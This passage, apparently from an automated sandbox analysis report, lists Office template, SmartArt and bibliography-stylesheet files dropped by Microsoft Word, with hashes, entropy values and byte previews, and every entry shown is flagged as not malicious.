...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):252
                              Entropy (8bit):3.48087342759872
                              Encrypted:false
                              SSDEEP:6:fxnxUXXt1MIae2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyfMIaRGHmD0+dAH/luWvv
                              MD5:69757AF3677EA8D80A2FBE44DEE7B9E4
                              SHA1:26AF5881B48F0CB81F194D1D96E3658F8763467C
                              SHA-256:0F14CA656CDD95CAB385F9B722580DDE2F46F8622E17A63F4534072D86DF97C3
                              SHA-512:BDA862300BAFC407D662872F0BFB5A7F2F72FE1B7341C1439A22A70098FA50C81D450144E757087778396496777410ADCE4B11B655455BEDC3D128B80CFB472A
                              Malicious:false
                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.i.c.t.u.r.e.F.r.a.m.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):4326
                              Entropy (8bit):7.821066198539098
                              Encrypted:false
                              SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                              MD5:D32E93F7782B21785424AE2BEA62B387
                              SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                              SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                              SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                              Malicious:false
                              Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):302
                              Entropy (8bit):3.537169234443227
                              Encrypted:false
                              SSDEEP:6:fxnxUXfQIUA/e/Wl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXZ/eulNGHmD0wbnKYZAH/lMZqiv
                              MD5:9C00979164E78E3B890E56BE2DF00666
                              SHA1:1FA3C439D214C34168ADF0FBA5184477084A0E51
                              SHA-256:21CCB63A82F1E6ACD6BAB6875ABBB37001721675455C746B17529EE793382C7B
                              SHA-512:54AC8732C2744B60DA744E54D74A2664658E4257A136ABE886FF21585E8322E028D8243579D131EF4E9A0ABDDA70B4540A051C8B8B60D65C3EC0888FD691B9A7
                              Malicious:false
                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0.n.m.e.r.i.c.a.l...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):217137
                              Entropy (8bit):5.068335381017074
                              Encrypted:false
                              SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                              MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                              SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                              SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                              SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):254
                              Entropy (8bit):3.4721586910685547
                              Encrypted:false
                              SSDEEP:6:fxnxUX9+RclTloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyteUTloGHmD0+dAH/luWvv
                              MD5:4DD225E2A305B50AF39084CE568B8110
                              SHA1:C85173D49FC1522121AA2B0B2E98ADF4BB95B897
                              SHA-256:6F00DD73F169C73D425CB9895DAC12387E21C6E4C9C7DDCFB03AC32552E577F4
                              SHA-512:0493AB431004191381FF84AD7CC46BD09A1E0FEEC16B3183089AA8C20CC7E491FAE86FE0668A9AC677F435A203E494F5E6E9E4A0571962F6021D6156B288B28A
                              Malicious:false
                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.e.v.r.o.n.a.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):4243
                              Entropy (8bit):7.824383764848892
                              Encrypted:false
                              SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                              MD5:7BC0A35807CD69C37A949BBD51880FF5
                              SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                              SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                              SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                              Malicious:false
                              Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):286
                              Entropy (8bit):3.4670546921349774
                              Encrypted:false
                              SSDEEP:6:fxnxUX0XPYDxUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPYDCloGHmD0+dAH/luWvv
                              MD5:3D52060B74D7D448DC733FFE5B92CB52
                              SHA1:3FBA3FFC315DB5B70BF6F05C4FF84B52A50FCCBC
                              SHA-256:BB980559C6FC38B703D1E9C41720D5CE8D00D2FF86D4F25136DB02B1E54B1518
                              SHA-512:952EF139A72562A528C1052F1942DAE1C0509D67654BF5E7C0602C87F90147E8EE9E251D2632BCB5B511AB2FF8A3734293D0A4E3DBD3D187F5E3C042685F9A0C
                              Malicious:false
                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.l.t.e.r.n.a.t.i.n.g.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                              Category:dropped
                              Size (bytes):5630
                              Entropy (8bit):7.87271654296772
                              Encrypted:false
                              SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                              MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                              SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                              SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                              SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                              Malicious:false
                              Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):278
                              Entropy (8bit):3.5280239200222887
                              Encrypted:false
                              SSDEEP:6:fxnxUXQAl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyllNGHmD0wbnKYZAH/lMZqiv
                              MD5:877A8A960B2140E3A0A2752550959DB9
                              SHA1:FBEC17B332CBC42F2F16A1A08767623C7955DF48
                              SHA-256:FE07084A41CF7DB58B06D2C0D11BCACB603D6574261D1E7EBADCFF85F39AFB47
                              SHA-512:B8B660374EC6504B3B5FCC7DAC63AF30A0C9D24306C36B33B33B23186EC96AEFE958A3851FF3BC57FBA72A1334F633A19C0B8D253BB79AA5E5AFE4A247105889
                              Malicious:false
                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.b...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):268317
                              Entropy (8bit):5.05419861997223
                              Encrypted:false
                              SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                              MD5:51D32EE5BC7AB811041F799652D26E04
                              SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                              SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                              SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):264
                              Entropy (8bit):3.4866056878458096
                              Encrypted:false
                              SSDEEP:6:fxnxUX0XrZUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXWloGHmD0+dAH/luWvv
                              MD5:6C489D45F3B56845E68BE07EA804C698
                              SHA1:C4C9012C0159770CB882870D4C92C307126CEC3F
                              SHA-256:3FE447260CDCDEE287B8D01CF5F9F53738BFD6AAEC9FB9787F2826F8DEF1CA45
                              SHA-512:D1355C48A09E7317773E4F1613C4613B7EA42D21F5A6692031D288D69D47B19E8F4D5A29AFD8B751B353FC7DE865EAE7CFE3F0BEC05F33DDF79526D64A29EB18
                              Malicious:false
                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                              Category:dropped
                              Size (bytes):6448
                              Entropy (8bit):7.897260397307811
                              Encrypted:false
                              SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                              MD5:42A840DC06727E42D42C352703EC72AA
                              SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                              SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                              SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                              Malicious:false
                              Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):242
                              Entropy (8bit):3.4938093034530917
                              Encrypted:false
                              SSDEEP:6:fxnxUX44lWWoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvToGHmD0+dAH/luWvv
                              MD5:A6B2731ECC78E7CED9ED5408AB4F2931
                              SHA1:BA15D036D522978409846EA682A1D7778381266F
                              SHA-256:6A2F9E46087B1F0ED0E847AF05C4D4CC9F246989794993E8F3E15B633EFDD744
                              SHA-512:666926612E83A7B4F6259C3FFEC3185ED3F07BDC88D43796A24C3C9F980516EB231BDEA4DC4CC05C6D7714BA12AE2DCC764CD07605118698809DEF12A71F1FDD
                              Malicious:false
                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                              Category:dropped
                              Size (bytes):4888
                              Entropy (8bit):7.8636569313247335
                              Encrypted:false
                              SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                              MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                              SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                              SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                              SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                              Malicious:false
                              Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):260
                              Entropy (8bit):3.494357416502254
                              Encrypted:false
                              SSDEEP:6:fxnxUX0XPE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPGHmD0+dAH/luWvv
                              MD5:6F8FE7B05855C203F6DEC5C31885DD08
                              SHA1:9CC27D17B654C6205284DECA3278DA0DD0153AFF
                              SHA-256:B7F58DF058C938CCF39054B31472DC76E18A3764B78B414088A261E440870175
                              SHA-512:C518A243E51CB4A1E3C227F6A8A8D9532EE111D5A1C86EBBB23BD4328D92CD6A0587DF65B3B40A0BE2576D8755686D2A3A55E10444D5BB09FC4E0194DB70AFE6
                              Malicious:false
                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.G.r.i.d...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                              Category:dropped
                              Size (bytes):6193
                              Entropy (8bit):7.855499268199703
                              Encrypted:false
                              SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                              MD5:031C246FFE0E2B623BBBD231E414E0D2
                              SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                              SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                              SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                              Malicious:false
                              Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):286
                              Entropy (8bit):3.5502940710609354
                              Encrypted:false
                              SSDEEP:6:fxnxUXfQICl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXClNGHmD0wbnKYZAH/lMZqiv
                              MD5:9B8D7EFE8A69E41CDC2439C38FE59FAF
                              SHA1:034D46BEC5E38E20E56DD905E2CA2F25AF947ED1
                              SHA-256:70042F1285C3CD91DDE8D4A424A5948AE8F1551495D8AF4612D59709BEF69DF2
                              SHA-512:E50BB0C68A33D35F04C75F05AD4598834FEC7279140B1BB0847FF39D749591B8F2A0C94DA4897AAF6C33C50C1D583A836B0376015851910A77604F8396C7EF3C
                              Malicious:false
                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):270198
                              Entropy (8bit):5.073814698282113
                              Encrypted:false
                              SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                              MD5:FF0E07EFF1333CDF9FC2523D323DD654
                              SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                              SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                              SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):288
                              Entropy (8bit):3.523917709458511
